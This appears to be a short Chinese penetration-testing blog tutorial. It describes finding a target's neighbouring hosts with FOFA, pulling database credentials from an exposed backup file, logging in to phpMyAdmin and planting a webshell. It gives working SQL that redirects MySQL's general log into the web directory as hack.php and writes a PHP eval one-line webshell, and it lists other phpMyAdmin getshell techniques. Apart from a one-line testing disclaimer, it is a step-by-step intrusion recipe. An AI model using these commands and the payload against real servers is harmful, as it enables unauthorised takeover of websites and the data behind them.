【渗透实战系列】|17-巧用fofa对目标网站进行getshell
涉及知识点:
信息搜集目标网站IP
利用fofa对目标ip的c段进行搜索
发现数据库备份文件和管理界面
登录数据库页面,进行写马
写马成功,获取webshell
声明:本文仅用于安全测试。
1、目标测试网站地址aa.bb.com
通过信息搜集获取到,该网站地址为ipw为x.x.x.x
2、fofa对目标地址C段进扫描
fofa输入关键字ip=“x.x.x.0/24”进行搜索,意外发现c段开着8090端口的地址
3、打开http://x.x.x.x:8090发现遍历文件目录,且意外发现数据库备份软件和mysql管理页面
打开数据库备份文件mysqlbackup.bat发现账户和密码
打开mysql管理页面
http://x.x.x.x/MySQL/ 发现为phpMyAdmin管理页面,利用备份文件获取的账户和密码顺利登录
4、phpMyAdmin写马
phpmyadmin后台getshell的常用手段有以下几种方式:
1、select into outfile直接写入
2、开启全局日志getshell
3、使用慢查询日志getsehll
4、使用错误日志getshell
5、利用phpmyadmin4.8.x本地文件包含漏洞getshell
执行以下sql语句
show variables like '%secure%';
发现没有写入权限,无法用select into outfile方法写入shell。我们再来看一下第二种方法,利用全局变量general_log去getshell
我们将全局日志开启并将保存日志的目录设为web目录
set global general_log=on;# 开启日志
set global general_log_file='C:/phpStudy/WWW/yxcms/hack.php';# 设置日志位置为网站目录
设置成功
此时执行如下语句即可写入webshell到hack.php中
select '<?php eval($_POST[whoami]); ?>'
用蚁剑连接即可
评论